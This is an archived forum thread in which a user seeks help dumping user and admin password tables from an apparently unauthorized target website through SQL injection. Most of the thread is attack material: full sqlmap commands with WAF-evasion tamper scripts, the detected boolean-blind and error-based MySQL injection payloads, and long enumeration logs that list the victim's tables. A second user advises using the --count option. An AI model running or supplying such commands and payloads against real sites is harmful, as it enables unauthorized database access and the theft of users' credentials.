PDA

Просмотр полной версии : pls help me

rinzing
12.11.2017, 23:56
hello everybody , i use sqlmap then query and get all name table and name columns for ready ,but when i do a dump :

| item |

| location |

| profile_pic |

| rdreamboard26 |

| refbrgy |

| refcitymun |

| refprovince |

| refregion |

| region |

| reply |

| reply_new |

| sub_category |

| test |

| test2 |

| users

-----------------

and column of Table users

| username

| password

-----------------

so i use dump

sqlmap -u "http:website.com" -D hotgamja -T users --dump --no-cast --flush-session --threads=5 --eta --batch

and

[07:41:26] [INFO] fetching columns for table 'users' in database 'hotgamja'

[07:41:35] [INFO] the SQL query used returns 2 entries

[07:41:35] [INFO] starting 5 threads

[07:45:35] [INFO] fetching entries for table 'users' in database 'hotgamja'

[07:45:35] [WARNING] the SQL query provided does not return any output

[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'

[07:45:35] [INFO] retrieved:

[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'

[07:45:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/

and nothing retrieved

so pls help me how can i do it bestter for get access to the data when dump

help me pls icq : 692615965

thank so much
rinzing
13.11.2017, 10:59
first thank for ur help

and it still this error can not dump columns info bro.(

root@kali:~# sqlmap -u "http://xxxxxx103846" -D hotgamja -T users --dump --no-cast --flush-session --threads=3 --tamper "space2morehash.py" "space2hash.py" "space2mysqlblank.py" "charencode.py" "chardoubleencode.py" "charunicodeencode.py" "percentage.py" --eta --batch --time-sec=10

[07:45:35] [WARNING] the SQL query provided does not return any output

[07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja'

[07:45:35] [INFO] retrieved:

[07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja'

bro can you talk with me by icq?
rinzing
13.11.2017, 11:55
database dump or tables dump or only columns dump all not get any infomation also bro

[08:26:25] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')

[08:26:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[08:26:26] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'

[08:26:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'

[08:26:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'

[08:26:43] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'

[08:26:51] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'

[08:26:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'

[08:27:09] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'

[08:27:15] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'

[08:27:25] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'

[08:27:30] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected

GET parameter 'x_code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection point(s) with a total of 234 HTTP(s) requests:

---

Parameter: x_code (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: b_code=xxxxx1103846' AND 9168=9168 AND 'BDvf'='BDvf

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: b_code=xxxxx1103846' AND (SELECT 1396 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1396=1396,1))),0x716b787871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Akmy'='Akmy

---

[08:27:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[08:27:30] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.29, Apache 2.2.34

back-end DBMS: MySQL >= 5.0

[08:27:30] [INFO] fetching columns for table 'ADMINMEMBER' in database 'hotgamja'

[08:28:11] [INFO] the SQL query used returns 8 entries

[08:28:11] [INFO] starting 3 threads

[08:30:45] [INFO] fetching entries for table 'ADMINMEMBER' in database 'hotgamja'

[08:30:45] [WARNING] the SQL query provided does not return any output

[08:30:45] [INFO] fetching number of entries for table 'ADMINMEMBER' in database 'hotgamja'

[08:30:45] [INFO] retrieved:

[08:30:46] [WARNING] unable to retrieve the number of entries for table 'ADMINMEMBER' in database 'hotgamja'

[08:30:46] [WARNING] HTTP error codes detected during run:

414 (Request-URI Too Long) - 1 times

[08:30:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com (http://www.xxxxx.com)'

shutting down at 08:30:46

root@kali:~#
rinzing
13.11.2017, 12:47
yes i look all bro

all table

| email_user_credit |

| email_user_credit_summary |

| email_user_stats_emailsperhour |

| email_usergroups |

| email_usergroups_access |

| email_usergroups_permissions |

| email_users |

| email_whitelabel_settings |

| item |

| location |

| profile_pic |

| rdreamboard26 |

| refbrgy |

| refcitymun |

| refprovince |

| refregion |

| region |

| reply |

| reply_new |

| sub_category |

| test |

| test2 |

| users |

+----------------------------------------+

look all column also, but when i have dump then get nothing infomation bro.
grimnir
13.11.2017, 13:59
try with --count cos possible table doesn't have any info


Code:
Retrieve number of entries for table(s)

Switch: --count

In case that user wants just to know the number of entries in table(s) prior to dumping the desired one, he can use this switch.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
--count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.users | 4 |
| dbo.users_blob | 2 |
+----------------+---------+
rinzing
13.11.2017, 14:17
i need show info when i use sqlmap dump bro
rinzing
13.11.2017, 14:33
everybody can help me pls(
grimnir
16.11.2017, 01:13
Did you read previous messages?? There all answers on your questions -try with COUNT parameter ,if this will return 0 means table have no any info
rinzing
16.11.2017, 09:12
pls help me with full sample command ..
rinzing
17.11.2017, 09:28
[20:11:11] [INFO] fetching tables for database: 'database'

[20:11:42] [INFO] the SQL query used returns 269 entries

[20:11:56] [INFO] retrieved: AA_test

[20:12:10] [INFO] retrieved: ADDSPEC

[20:12:26] [INFO] retrieved: ADMINMEMBER

check count is working bro
grimnir
17.11.2017, 18:13
You need just count table with name USERS so try -D hotgamja -T users --count
rinzing
17.11.2017, 23:43
[23:58:39] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.29, Apache 2.2.34

back-end DBMS: MySQL >= 5.0

[23:58:55] [INFO] resumed:

[23:58:55] [ERROR] unable to retrieve the number of entries for any table

[23:58:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com (http://www.xxxxx.com)'

shutting down at 23:58:55

( Maybe it was blocked by something